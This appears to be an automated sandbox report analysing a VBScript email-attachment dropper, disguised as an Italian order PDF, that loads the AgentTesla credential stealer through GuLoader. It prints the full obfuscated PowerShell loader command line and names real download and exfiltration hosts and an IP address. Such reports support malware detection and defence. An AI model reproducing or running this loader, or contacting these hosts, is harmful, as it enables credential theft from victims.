
Windows Analysis Report
Ordine n.47201 pdf.vbs

Overview

General Information

Sample Name: Ordine n.47201 pdf.vbs
Analysis ID: 755275
MD5: c8290bc8659c4a6a45ccd1af9268e400
SHA1: d2a97dd4fa44d5e2a568d75b764cc47e5878f960
SHA256: f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
Tags: agentteslavbs

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • wscript.exe (PID: 5812 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 5780 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5864 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo 
PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKllHaaUptNa)Co;La[BaDHelNelUnIDimRapChoGrrGetTi(mi`"""cogRadPaiTe3Ba2Ho`"""Un)no]OppSwuWhbXelRuikucBi UnsMatFraJotSoiIscAs SoeWoxPitSyeKvrSenSt DiisanEptDa PaGAfeMbtFlCHylAfiSaptaRCagEnnKa(koiBenPatCa KaRSeuEklEnaYa,PsiSknWatMi BlLNiiKnkInvLa1Bl0Fo4Ru)Sy;Ra[AlDArlAblPrILimBepdeotirSetJa(pa`"""BauPasEdeSkrps3me2Gi`"""De)In]UdpInuBlbuolUniTmcUn FrsVitStaChtNoiBucAn AneTaxEttIneobrTanHj EtiArnSktSn KaGsueChtSnCOpllaiCaeSonNitBuRPaeClcUntUd(DeiCanAstEp UpdSaeGoslu,MiiUmnFotHe WiCMoeAcnGe)Fu;St[EnDFolNdlfrIramZopSkoPlrNitRe(Fu`"""SjkDyeTrrAnnOpePulAc3Un2su`"""Da)Am]RapopuTobFolDaiDrcAu AbsSptBiaCetFuiEncPa PseClxFetSeeMirSynTo GlISunCrtSpPdetPerUn PaESenFauDomAfSUnybasAdtbreUdmDiLStoFacReaGalTreSwsAmWKr(ScuKaiAdnLitUn StvKa1Al,DeiFrnsytTr 
OovGo2pl)re;ca}bl'Sa;An`$seSretLauKreMeoGarOpgbolKoeKorHusDr3Al=Sr[TrSRetDiuAneRooGrrSkgFolHeePorApsHa1Bl]In:Fl:MoVSniSarSetCaunoaSalAkATrlAvlKjoMucPe(Ne0no,Sc1Li0Bo4Co8Sp5ab7Th6Tr,Ko1Ud2Ka2Ag8Se8ba,Ch6Zo4Ja)Fo;Dr`$AfmKauGitJeaRitPaiMaoFanBniofsPetPa=Va(SeGPeemotAu-TiILhtSheFemOvPRerHjoStpFleFerHatUnyfe Pl-GuPOuaTjtAphMa Su'ErHUnKSuCMeUCh:Rn\SpNSueStcChrchoInlPeoTeggsiDecSnaAplWi\NaIDagAsnAdoForAreprrOviPenClgDieBerFasUm'Up)An.paSAckChiKlfSernyePrtSt;Pr`$EckUlrTaaUnkUnnRoiBonSggAweSurSmsAf Gl=Pi Rh[OkSAsyFoshytUneChmKo.ToCChoDanAnvMeebarHytVe]Ch:Th:BeFAfrCloMimDeBEnaUdsCieCo6Fo4OtSDitSerSuiAunSugMi(Fa`$EfmSouOvtUdaFitDeiReoMenRiiDosLotor)Re;Sp[FlSGuyUdstatFoeStmMe.WiRSkuDinUntAliMamTieUn.CiIUdnMetskeOvrKooSnpFiSDyeDirCrvMaiFrcFoeInsAl.SyMBeaTeransWrhkoaDelWi]Un:De:SkCAroStpSpyUn(Dr`$UlkCorToaOukFanHeiNonBlgCheSerFasLi,Mi Fl0He,Pa En Pu`$PoSPatDeuKaeBioPurVrgRulSkeOvrIwsIn3ie,To Sk`$MlkRerStaMekFrnRoiConAngSteOprOvsSa.SncCaodeuRanKrtPr)Un;Is[NeSMetebuBeePeoUnrSagOllUdeInrSasSo1Pr]Pe:Pa:SiEKanpiuUkmOpSTyySvsBrtcoeKrmHaLWeoAicLaaKrlWieMiswoWLn(Ba`$SpSDetSpuMaePaoNurUtgInlSaehyrEnsHj3Sc,Bi Kn0Me)Fo#Sk;""";Function Stueorglers4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $discontentment = $discontentment + $HS.Substring($i, 1); } $discontentment;}$Sudser0 = Stueorglers4 'riISyEScXFr ';$Sudser1= Stueorglers4 $Skoleeksempel;&$Sudser0 $Sudser1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 1156 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
      • CasPol.exe (PID: 4844 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)
  • cleanup
No configs have been found
Source: Ordine n.47201 pdf.vbs
Rule: WScript_Shell_PowerShell_Combo
Description: Detects malware from Middle Eastern campaign reported by Talos
Author: Florian Roth
Strings:
  • 0xa36:$s1: .CreateObject("WScript.Shell")
  • 0x3cde2:$p1: powershell.exe
  • 0x49c55:$p1: powershell.exe

Source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_AgentTesla_1
Description: Yara detected AgentTesla
Author: Joe Security

Source: 00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp
Rule: JoeSecurity_CredentialStealer
Description: Yara detected Credential Stealer
Author: Joe Security

Source: 00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

Source: amsi64_5812.amsi.csv
Rule: WScript_Shell_PowerShell_Combo
Description: Detects malware from Middle Eastern campaign reported by Talos
Author: Florian Roth
Strings:
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1db:$p1: powershell.exe

        Data Obfuscation

        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo 
NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCT
Timestamp: 11/28/22-14:53:16.335427
Source IP: 192.168.2.7
Destination IP: 185.31.121.136
Source Port: 49726
Destination Port: 61313
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/28/22-14:53:16.290035
Source IP: 192.168.2.7
Destination IP: 185.31.121.136
Source Port: 49725
Destination Port: 21
SID: 2029927
Protocol: TCP
Classtype: A Network Trojan was detected


        AV Detection

Source: ftp.mcmprint.net | Virustotal: Detection: 9%
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: unknown | HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: Binary string: l;C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.pdb source: powershell.exe, 00000003.00000002.601070377.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp

        Networking

Source: Traffic | Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.7:49725 -> 185.31.121.136:21
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49726 -> 185.31.121.136:61313
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | DNS query: name: api.ipify.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | IP Address: 52.20.78.240
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Host: api.ipify.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /Akkant/bwqPIdZhEA125.psm HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: qwedft.gq Cache-Control: no-cache
Source: global traffic | TCP traffic: 192.168.2.7:49726 -> 185.31.121.136:61313
Source: unknown | FTP traffic detected: 185.31.121.136:21 -> 192.168.2.7:49725 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | DNS traffic detected: queries for: qwedft.gq
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D2AA09A recv,

        System Summary

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt 
SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
Source: Initial file: Skakspillene.ShellExecute Squawky, " " & chrw(34) & B6 & chrw(34), "", "", 0
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5068
Source: Ordine n.47201 pdf.vbs, type: SAMPLE | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_5812.amsi.csv, type: OTHER | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D4C8B70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D4C87F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D4CE844
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D4C0870
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D4C6BE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D4C6420
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_200F9020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_200F7888
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_200FC178
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_200FDF10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_200F4B28
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_200FD231
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_20103418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_20101834
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_20102FD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_20100070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_20100015
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D2AB206 NtQuerySystemInformation,
